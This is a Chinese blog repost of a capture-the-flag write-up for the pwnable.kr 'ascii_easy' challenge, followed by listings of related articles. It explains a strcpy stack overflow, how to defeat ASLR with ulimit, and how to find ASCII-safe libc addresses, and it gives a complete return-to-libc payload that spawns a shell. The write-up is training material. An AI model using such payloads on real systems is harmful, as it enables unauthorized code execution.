【pwnable.kr】 ascii_easy

最新推荐文章于 2020-04-29 15:31:35 发布
最新推荐文章于 2020-04-29 15:31:35 发布
阅读量789 收藏
点赞数
分类专栏: Pwnable.kr

https://blog.yiz96.com/pwnable-ascii_easy/

这道题首先给出了提示”ulimit”,这里是一个可以禁用ALSR的黑科技,当设置ulimit -s unlimted时,系统的ALSR将会失效,原因在于arch/x86/mm/mmap.c中:

 

1

2

3

4

5

6

7

8

9

10

static int mmap_is_legacy(void)

{

    if (current->personality & ADDR_COMPAT_LAYOUT)

            return 1;

 

    if (rlimit(RLIMIT_STACK) == RLIM_INFINITY)

            return 1;

 

    return sysctl_legacy_va_layout;

}

在第二个if会返回true,所以ALSR就不起作用了,所有的地址成为固定值。

 

然后我们再看这个题,F5反汇编得到:

 

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

int __cdecl main(int argc, const char **argv, const char **envp)

{

  char *v3; // ebx@6

  unsigned int v5; // [esp+28h] [ebp-Ch]@4

  char *v6; // [esp+2Ch] [ebp-8h]@1

 

  v6 = (char *)mmap((void *)0x80000000, 0x1000u, 7, 50, -1, 0);

  if ( v6 != (char *)0x80000000 )

  {

    puts("mmap failed. tell admin");

    _exit(1);

  }

  printf("Input text : ");

  v5 = 0;

  do

  {

    if ( v5 > 0x18F )

      break;

    v3 = &v6[v5];

    *v3 = getchar();

    ++v5;

  }

  while ( is_ascii(*v3) );

  puts("triggering bug...");

  return (int)vuln();

}

 

_BOOL4 __cdecl is_ascii(signed int a1)

{

  return a1 > 31 && a1 <= 127;

}

 

char *vuln()

{

  char dest; // [esp+10h] [ebp-A8h]@1

 

  return strcpy(&dest, (const char *)0x80000000);

}

可以看出vuln()中dest长度为0xA8,而strcpy的源字符串长度最大 0x18F,存在栈溢出。常规的想法是通过一个 “x”*0xA8 + oebp + ret_addr + ‘xxxx’ + ‘sh’ 的payload覆盖ret,控制eip执行system(‘/bin/sh’)拿到shell。

然后使用gdb查看system的函数地址:

这个函数地址是符合要求的(能通过ascii检查),再看一下system函数在libc中的地址:

是0x3f250.

然后我们还需要在libc里面找一个”sh\x00″的字符串地址,我们使用ida的search -> sequence of bytes功能,搜索”73 68 00″,找到了四个结果,我们依次看看这四个结果。

假设”sh\x00″的起始地址是str_addr,那么libc加载到ascii_easy之后的地址应该是 0x555c5250 – 0x3f250 + str_addr

上面四个地址计算结果分别是(注意左边一栏并不是sh的开始地址,而是指令的开始地址):0x556E2495,0x556E2801,0x556E4A31,0x556E69C2,其中只有第三个(0x556E4A31)是可以通过ascii的检查的,所以我们使用这个做为system()的参数字符串指针地址。

所以最后的payload是:

1

(python -c "print 'A'*0xa8 + 'aaaa' +'\x50\x52\x5c\x55'+'aaaa'+'\x31\x4a\x6e\x55'";cat) | ./ascii_easy

这个题到这里已经结束了,但是在以前(大概是去年)这么做还不行,因为据inhack说当时的libc的system地址跟我现在看到的不一样,导致四个”sh”的字符串地址都无法使用。所以他需要用别的方法,比如:将自己的tmp目录加入环境变量,写一个只包含system(“/bin/sh”)的c程序,然后到libc中寻找可以使用的字符串,比如:

这里的library的地址计算之后恰好可以通过ascii检查,那么就让自己的可执行文件名字改成library,这样调用library可以直接执行自己写的程序。

TYW----子曰小玖
关注
专栏目录
pwnable.kr-wtf
r00tnb的博客
07-26 831
前言 一道代码很简单,但是却花了我好长时间的题目。挺有意思的,考察输入缓冲区的。 分析 还是先分析代码 #!/usr/bin/python2 import os, sys, time import subprocess from threading import Timer TIME = 5 class MyTimer(): timer=None def __i...
pwnable.kr-fix
r00tnb的博客
02-28 872
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include &amp;lt;stdio.h&amp;gt; // 23byte shellcode from http://shell-storm...
easy-ascii:快速查找并复制ASCII字符
04-02
easyASCII 干净,简单,易于使用的ASCII代码列表,用于复制和粘贴。 目录 分类目录 版权符号 货币 空间 破折号 引号 大写 小写字母 大写 小写字母 符号 分数 平等/不平等 杂项 手 天气 天体 卡套装 棋子 音符 复选标记 办公室 杂项 内置 HTML5 CSS3 具有超能力CSS。 -jQuery是一个快速,小型且功能丰富JavaScript库。 执照 麻省理工学院-
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1753
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr】 tiny_easy
子曰小玖的博客
06-06 716
https://r00tnb.github.io/2018/02/26/pwnable.kr-tiny_easy/ 前言 考验漏洞利用能力的题目,长姿势了。参考了别人的writeup 分析 没有源代码,就丢ida逆向了 1 2 3 4 5 6 7 8 9 10 11 12 13 14 LOAD:08048054 ; Attributes: nore...
Pwnable.kr WP
AlexYoung28的博客
08-13 946
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 940
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
KR2660_DMB_AV_TV_VGA_code.rar_KR266Xseries.Uv2_rtd2660 开发包_rtd26
07-14
realtek的RTD2660开发包,主要用于车载显示器
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 576
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 690
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
pwnable.kr解题write up —— Toddler's Bottle(二)
逆水行舟
01-21 4574
网站地址:pwnable.kr 提供许多优质的ctf训练题,题目设计的都非常巧妙,适合思考。
小白pwn之旅之pwnable03
qq_41078843的博客
04-29 165
pwnable—passcode和random passcode 1.先看代码 #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); ...
【逆向学习】 拯救地球 writeup
charlie_heng的专栏
12-20 791
这是16年的国赛的逆向,话说这名字感觉真有点中二。。。。首先反编译了一下class文件,看了下,并没有什么重要的东西,只是调用了native函数然后反编译下so文件首先看了下JNI_Onload函数 看起来注册了一个native函数,进那个函数看下然后按alt+G把值改为1,设为code16模式看了下大部分都是各种反调试,还有提取资源比较有用的是sub_2B40里的sub_1760这三个函数的作用
pwnable.kr第二遍---input
leeham的博客
03-16 571
&gt;&gt;&gt;input1.命令whoami---input2groups---input2ls -l:发现其他用户对input2可执行文件没有执行权限;只对文件owner和input2组用户有该权限;然后发现input2用户也位于input2-group中2.字符与数字之间的转换各进制之间的转换chr ord bin oct int hex字符和ascii:chr ord转成十进制:i...
pwnable.kr bof
潜心学习
07-04 1172
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
pwnable 之collision
bluestar628的博客
03-28 1170
pwnable collision
pwnable.kr-----解题过程】flag
lyuchen65的博客
09-16 2216
看题目得知题目要求是二进制逆向,下载得到flag文件,ida载入,发现upx压缩了,linux下使用upx -d 解压缩之后在ida载入,发现关键代码如下:如图中红色方块所表示,ida跳转到相应内存位置,发现关键语句:尝试提交UPX...? sounds like a delivery service 多次后无果,怀疑有没有显示出来的字符,因为flag已经确定是写在文件中的,所以用winhex打开
Format String 漏洞介绍 总结(一)
爱.NET
05-29 663
Format String 漏洞介绍 总结(一)bkbll(bkbll@cnhonker.net)2003/4/8其实这篇文章没什么技术含量,format string(格式化字符串)漏洞很久很久就被研究透了,scut的一篇pd文档属于非常详细的介绍/入门级文章,但是全英文以及里面例子有些解释不彻底, 以及有些例子已经不能使用了,所以这里想大致总结一下,并给出实验好的环境和代码.(实验平台:rh8...
TranslateWarning: Unable to determine instrument from <music21.midi.MidiEvent SEQUENCE_TRACK_NAME, track=8, channel=None, data=b'Copyright 1997 by Bernd Kr\xfcger.'>; getting generic Instrument TranslateWarning)问题
最新发布
06-12
这个警告消息来自音乐处理库 `music21`,它表示在处理 MIDI 文件时无法确定乐器类型,因此默认使用通用的乐器类型。这个警告消息本身不会影响程序的运行,但它可能提示你的代码中有一些潜在的问题需要处理。 为了解决这个问题,你可以检查 MIDI 文件中的乐器类型是否正确,并尝试手动设置乐器类型。你可以使用 `music21` 中的 `Instrument` 类来设置乐器类型。具体来说,你可以使用 `midiFile.instruments` 属性获取 MIDI 文件中的乐器列表,并使用 `Instrument` 类来设置每个乐器的类型。例如: ```python import music21 # 读取 MIDI 文件 midiFile = music21.midi.MidiFile() midiFile.open('example.mid') midiFile.read() midiFile.close() # 设置乐器类型 for i in midiFile.instruments: i.instrumentName = 'Guitar' # 设置乐器类型为吉他 i.instrumentAbbreviation = 'Gt.' # 设置缩写 ``` 通过手动设置乐器类型,你可以避免出现无法确定乐器类型的警告消息,并确保你的程序正确处理 MIDI 文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值